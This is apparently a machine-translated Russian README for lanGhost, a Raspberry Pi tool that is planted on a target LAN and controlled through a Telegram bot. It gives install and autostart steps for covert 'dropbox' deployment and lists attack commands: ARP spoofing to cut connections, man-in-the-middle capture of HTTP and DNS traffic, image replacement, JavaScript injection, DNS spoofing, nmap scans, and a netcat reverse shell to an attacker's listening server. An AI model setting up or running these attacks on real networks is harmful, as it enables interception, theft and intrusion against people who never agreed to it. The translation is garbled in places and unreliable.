lanGhost разработан для Raspberry Pis ( Raspbian / Kali для RPi ). Запуск его на других / настольных дистрибутивах может вызвать проблемы и может не работать как исключение.
Вам понадобится ** Raspberry Pi ** с ** свежим Raspbian / Kali ** на SD-карте, потому что вы не хотите, чтобы что-либо еще работало в фоновом режиме.
Загрузите Pi, получите SSH-продажу или подключите монитор и клавиатуру и введите следующие команды:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/Durka22/lanGhost-termux.git
$ cd lanGhost
$ bash setup.py
Пожалуйста, ** прочтите ** вопросы / сообщения при запуске сценария установки!
[+] Введите имя подключенного сетевого интерфейса / будет
быть подключенным к целевой LAN. Проводной интерфейс по умолчанию - eth0,
а беспроводной интерфейс по умолчанию - wlan0 в большинстве систем, но
вы можете проверить это в другом терминале с помощью команды ifconfig.
[+] Создайте ключ API Telegram, отправив сообщение @BotFather в Telegram
с командой '/newbot'.
После этого @BotFather попросит вас выбрать имя для вашего бота.
Это может быть что угодно.
Наконец, @BotFather попросит вас указать имя пользователя для вашего бота. У тебя есть
чтобы выбрать здесь уникальное имя пользователя, которое заканчивается на «бот». За
пример: xdavidbot. Запишите это имя пользователя, так как позже
вам нужно будет искать это, чтобы найти своего бота, который lanGhost
будет работать дальше.
После того, как вы отправите свое имя пользователя на @BotFather, вы получите
ваш ключ API.
[+] Теперь, чтобы lanGhost разрешал доступ только вам, вам нужно подтвердить себя.
Отправьте проверочный код, указанный ниже, ТОЧНОМУ, который вы только что создали. Просто найдите свой
@username бота (то, что вы отправили @BotFather), чтобы найти его.
[+] Код подтверждения для отправки: ******
[+] Вы хотите, чтобы lanGhost запускался при загрузке? Эта опция необходима, если вы используете
это устройство как Dropbox, потому что, когда вы собираетесь бросить это устройство в
сети, у вас не будет возможности запустить lanGhost удаленно! (автозапуск работает
добавив новую запись cron '@reboot')
Использование lanGhost в сетях больше / 24 не рекомендуется , так как сканирование займет слишком много времени..
lanGhost не тихий . Любой, кто отслеживает трафик, может видеть пакеты ARP.!
Если вы выбрали «да» на «шаге 4/4 (автозапуск)», Pi полностью настроен для сброса. lanGhost должен запуститься при загрузке и отправить вам сообщение в Telegram с текстом: lanGhost start! 👻
.
Обязательно сначала опробуйте его в своей лаборатории и проверьте, отвечает ли lanGhost на ваши сообщения!
Если у вас все настроено, просто подключите его к целевой сети, подключив кабель Ethernet к Pi и подключив питание через микро-USB, и вы готовы к работе!
(lanGhost также может работать через Wi-Fi, но сначала вам нужно настроить wpa_supplicant для автоматического подключения к сети)
/ scan - сканировать локальную сеть
/ scanip [TARGET-IP] - сканировать определенный IP-адрес.
/ kill [TARGET-IP] - Остановить сетевое соединение цели.
/ mitm [TARGET-IP] - Захват HTTP / DNS-трафика от цели.
/ replaceimg [TARGET-IP] - Заменить HTTP-образы, запрошенные целью.
/ injectjs [TARGET-IP] [JS-FILE-URL] -Внедрить JavaScript в HTTP-страницы, запрошенные целью.
/ spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Подмена DNS-записей для цели.
/ attack - Просмотр текущих атак.
/ stop [ATTACK-ID] - Остановить текущую атаку.
/ restart - перезапустить lanGhost.
/ reversesh [TARGET-IP] [PORT] - Создать обратную оболочку netcat для цели.
/ help - Показать меню справки.
/ping - Pong.
Вы можете начать атаку с помощью одной из этих команд: / kill, / mitm, / replaceimg, / injectjs, / spoofdns
Взаимодействие с другими людьми
Если у вас запущена одна или несколько атак, вы можете использовать команду / attack
, чтобы получить их список, содержащий идентификаторы ATTACK-ID.
Взаимодействие с другими людьми
Чтобы остановить атаку, введите / stop [ATTACK-ID]
.
/reversesh
устанавливает только TCP-соединение netcat, которое не зашифровано, и весь трафик можно контролировать! Используйте его только для аварийных исправлений или для настройки зашифрованного обратного соединения при необходимости.
$ nc -l 0.0.0.0 [PORT]
Команда Telegram:
/reversesh [IP-of-your-listening-server] [PORT]
/ kill
- останавливает подключение к Интернету для цели./ mitm
- захватывает HTTP- и DNS-трафик от цели и отправляет его в текстовых сообщениях./ replaceimg
- Заменяет HTTP-изображения для цели на то, что вы отправляете боту./ injectjs
- внедряет JavaScript в каждый ответ HTTP HTML для цели. Вам необходимо разместить JS-файл на своем сервере и указать URL-адрес в качестве параметра./ spoofdns
- Имитирует ответы DNS для цели.
Все атаки используют ** ARP Spoofing **!
/ scan
- Сканирует локальную сеть и возвращает хосты в оперативный режим. Использует nmap -sn scan для обнаружения хостов./ scanip
- Сканирует IP-адрес на предмет открытых портов и другой информации. Использует сканирование nmap -sS.
Вы будете получать сообщение каждый раз, когда новое устройство подключается / покидает сеть.
Я не несу ответственности ни за что, что вы делаете с этой программой, поэтому, пожалуйста, используйте ее только в хороших и образовательных целях.
Авторские права (c) 2018 Дэвид Шютц. Некоторые права защищены.
lanGhost находится в соответствии с условиями лицензии MIT с учетом всех пояснений, содержащихся в файле лицензии. Вы также можете написать мне по адресу xdavid {at} protonmail {dot} com.